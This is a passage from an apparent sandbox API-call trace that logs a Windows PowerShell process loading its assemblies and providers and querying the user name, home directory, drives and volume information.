dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x288c388*="Alias", lpRawData=0x288c244) returned 1 [0027.195] GetLastError () returned 0x0 [0027.196] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.196] GetLastError () returned 0xcb [0027.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdf54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.196] GetLastError () returned 0xcb [0027.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdf04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.196] GetLastError () returned 0xcb [0027.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdf04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.196] GetLastError () returned 0xcb [0027.196] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2b6c80, nSize=0x1ce554 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x1ce554) returned 0x1 [0027.197] GetLastError () returned 0xcb [0027.197] GetUserNameW (in: lpBuffer=0x2b64c0, pcbBuffer=0x1ce55c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x1ce55c) returned 1 [0027.197] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x28902ec*="Environment", lpRawData=0x28901a8) returned 1 [0027.197] GetLastError () returned 0x0 [0027.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.198] GetLastError () returned 0xcb [0027.198] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0027.198] GetLastError () returned 0xcb [0027.198] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="\\Users\\BGC6u8Oy yXGxkR") returned 0x16 [0027.198] GetLastError () returned 0xcb [0027.198] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", nBufferLength=0x105, lpBuffer=0x1ce084, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0027.198] GetLastError () returned 0xcb [0027.198] SetErrorMode (uMode=0x1) returned 0x1 [0027.198] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR" (normalized: "c:\\users\\bgc6u8oy yxgxkr"), fInfoLevelId=0x0, lpFileInformation=0x1ce504 | out: lpFileInformation=0x1ce504*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x233be580, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x23db61a0, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x23db61a0, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0027.198] GetLastError () returned 0xcb [0027.198] SetErrorMode (uMode=0x1) returned 0x1 [0027.200] GetLogicalDrives () returned 0x4 [0027.200] GetLastError () returned 0xcb [0027.201] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cdfa8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0027.201] GetLastError () returned 0xcb [0027.202] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0027.202] GetLastError () returned 0xcb [0027.202] SetErrorMode (uMode=0x1) returned 0x1 [0027.203] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b65c0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1ce4d0, lpMaximumComponentLength=0x1ce4cc, lpFileSystemFlags=0x1ce4c8, lpFileSystemNameBuffer=0x2b64c0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ce4d0*=0x78b95e2e, lpMaximumComponentLength=0x1ce4cc*=0xff, lpFileSystemFlags=0x1ce4c8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0027.203] GetLastError () returned 0xcb [0027.203] SetErrorMode (uMode=0x1) returned 0x1 [0027.203] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0027.203] GetLastError () returned 0xcb [0027.203] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ce030, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0027.203] GetLastError () returned 0xcb [0027.203] SetErrorMode (uMode=0x1) returned 0x1 [0027.204] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x289150c | out: lpFileInformation=0x289150c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0027.204] GetLastError () returned 0xcb [0027.204] SetErrorMode (uMode=0x1) returned 0x1 [0027.204] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ce030, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0027.204] GetLastError () returned 0xcb [0027.204] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cdfbc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0027.204] GetLastError () returned 0xcb [0027.204] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0027.204] GetLastError () returned 0xcb [0027.205] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cdf78, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0027.205] GetLastError () returned 0xcb [0027.205] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0027.205] GetLastError () returned 0xcb [0027.206] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cdf80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0027.206] GetLastError () returned 0xcb [0027.206] SetErrorMode (uMode=0x1) returned 0x1 [0027.207] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2892164 | out: lpFileInformation=0x2892164*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0027.207] GetLastError () returned 0xcb [0027.207] SetErrorMode (uMode=0x1) returned 0x1 [0027.207] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cdf88, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0027.207] GetLastError () returned 0xcb [0027.207] SetErrorMode (uMode=0x1) returned 0x1 [0027.207] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28922b4 | out: lpFileInformation=0x28922b4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0027.207] GetLastError () returned 0xcb [0027.207] SetErrorMode (uMode=0x1) returned 0x1 [0027.207] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cdfcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0027.207] GetLastError () returned 0xcb [0027.207] SetErrorMode (uMode=0x1) returned 0x1 [0027.207] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2892454 | out: lpFileInformation=0x2892454*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0027.207] GetLastError () returned 0xcb [0027.207] SetErrorMode (uMode=0x1) returned 0x1 [0027.207] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2b6c80, nSize=0x1ce554 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x1ce554) returned 0x1 [0027.207] GetLastError () returned 0xcb [0027.207] GetUserNameW (in: lpBuffer=0x2b64c0, pcbBuffer=0x1ce55c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x1ce55c) returned 1 [0027.208] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x28951ac*="FileSystem", lpRawData=0x2895068) returned 1 [0027.208] GetLastError () returned 0x0 [0027.209] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.209] GetLastError () returned 0xcb [0027.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.209] GetLastError () returned 0xcb [0027.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.209] GetLastError () returned 0xcb [0027.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.210] GetLastError () returned 0xcb [0027.210] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2b6c80, nSize=0x1ce554 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x1ce554) returned 0x1 [0027.210] GetLastError () returned 0xcb [0027.210] GetUserNameW (in: lpBuffer=0x2b64c0, pcbBuffer=0x1ce55c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x1ce55c) returned 1 [0027.210] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x289926c*="Function", lpRawData=0x2899128) returned 1 [0027.211] GetLastError () returned 0x0 [0027.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.212] GetLastError () returned 0xcb [0027.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdf68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.215] GetLastError () returned 0xcb [0027.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdf18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.215] GetLastError () returned 0xcb [0027.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdf18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.215] GetLastError () returned 0xcb [0027.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdf18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.215] GetLastError () returned 0xcb [0027.243] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2b6c80, nSize=0x1ce554 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x1ce554) returned 0x1 [0027.244] GetLastError () returned 0xcb [0027.244] GetUserNameW (in: lpBuffer=0x2b64c0, pcbBuffer=0x1ce55c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x1ce55c) returned 1 [0027.245] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x28b22f0*="Registry", lpRawData=0x28b21ac) returned 1 [0027.245] GetLastError () returned 0x0 [0027.246] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2b6c80, nSize=0x1ce554 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x1ce554) returned 0x1 [0027.246] GetLastError () returned 0x0 [0027.247] GetUserNameW (in: lpBuffer=0x2b64c0, pcbBuffer=0x1ce55c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x1ce55c) returned 1 [0027.247] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x28b60a8*="Variable", lpRawData=0x28b5f64) returned 1 [0027.247] GetLastError () returned 0x0 [0027.248] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.249] GetLastError () returned 0xcb [0027.251] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.251] GetLastError () returned 0xcb [0027.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cdf54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0027.252] GetLastError () returned 0xcb [0027.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cdf04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0027.252] GetLastError () returned 0xcb [0027.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cdf04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0027.252] GetLastError () returned 0xcb [0027.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cdf04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0027.253] GetLastError () returned 0xcb [0027.289] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2b6c80, nSize=0x1ce554 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x1ce554) returned 0x1 [0027.289] GetLastError () returned 0x3 [0027.290] GetUserNameW (in: lpBuffer=0x2b64c0, pcbBuffer=0x1ce55c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x1ce55c) returned 1 [0027.290] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x28c3e3c*="Certificate", lpRawData=0x28c3cf8) returned 1 [0027.290] GetLastError () returned 0x0 [0027.299] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.299] GetLastError () returned 0xcb [0027.301] GetLogicalDrives () returned 0x4 [0027.301] GetLastError () returned 0xcb [0027.301] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ce0cc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0027.301] GetLastError () returned 0xcb [0027.301] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0027.301] GetLastError () returned 0xcb [0027.302] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2b64c0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0027.302] GetLastError () returned 0xcb [0027.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.303] GetLastError () returned 0xcb [0027.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.303] GetLastError () returned 0xcb [0027.311] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.311] GetLastError () returned 0xcb [0027.312] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.312] GetLastError () returned 0xcb [0027.312] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x1cdf14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0027.312] GetLastError () returned 0xcb [0027.312] SetErrorMode (uMode=0x1) returned 0x1 [0027.312] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x28cb69c | out: lpFileInformation=0x28cb69c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x237c2aa0, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x3b95c310, ftLastAccessTime.dwHighDateTime=0x1d34280, ftLastWriteTime.dwLowDateTime=0x3b95c310, ftLastWriteTime.dwHighDateTime=0x1d34280, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0027.313] GetLastError () returned 0xcb [0027.313] SetErrorMode (uMode=0x1) returned 0x1 [0027.313] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x1cdf1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0027.313] GetLastError () returned 0xcb [0027.313] SetErrorMode (uMode=0x1) returned 0x1 [0027.313] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x28cb848 | out: lpFileInformation=0x28cb848*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x237c2aa0, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x3b95c310, ftLastAccessTime.dwHighDateTime=0x1d34280, ftLastWriteTime.dwLowDateTime=0x3b95c310, ftLastWriteTime.dwHighDateTime=0x1d34280, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0027.313] GetLastError () returned 0xcb [0027.313] SetErrorMode (uMode=0x1) returned 0x1 [0027.313] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.313] GetLastError () returned 0xcb [0027.314] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x1ce064, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0027.315] GetLastError () returned 0xcb [0027.315] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cdfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0027.315] GetLastError () returned 0xcb [0027.315] SetErrorMode (uMode=0x1) returned 0x1 [0027.315] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ce460 | out: lpFileInformation=0x1ce460*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0027.315] GetLastError () returned 0xcb [0027.315] SetErrorMode (uMode=0x1) returned 0x1 [0027.315] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cdfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0027.315] GetLastError () returned 0xcb [0027.315] SetErrorMode (uMode=0x1) returned 0x1 [0027.315] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ce460 | out: lpFileInformation=0x1ce460*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0027.315] GetLastError () returned 0xcb [0027.315] SetErrorMode (uMode=0x1) returned 0x1 [0027.316] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cdff4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0027.316] GetLastError () returned 0xcb [0027.316] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cdf90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0027.316] GetLastError () returned 0xcb [0027.316] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1cdfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0027.316] GetLastError () returned 0xcb [0027.316] SetErrorMode (uMode=0x1) returned 0x1 [0027.316] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1ce460 | out: lpFileInformation=0x1ce460*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x233be580, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x233be580, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0027.316] GetLastError () returned 0xcb [0027.316] SetErrorMode (uMode=0x1) returned 0x1 [0027.316] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1cdfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0027.316] GetLastError () returned 0xcb [0027.316] SetErrorMode (uMode=0x1) returned 0x1 [0027.316] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1ce460 | out: lpFileInformation=0x1ce460*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x233be580, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x233be580, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0027.316] GetLastError () returned 0xcb [0027.316] SetErrorMode (uMode=0x1) returned 0x1 [0027.316] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1cdff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0027.316] GetLastError () returned 0xcb [0027.316] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x1cdf90, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0027.316] GetLastError () returned 0xcb [0027.316] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", nBufferLength=0x105, lpBuffer=0x1cdfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0027.316] GetLastError () returned 0xcb [0027.316] SetErrorMode (uMode=0x1) returned 0x1 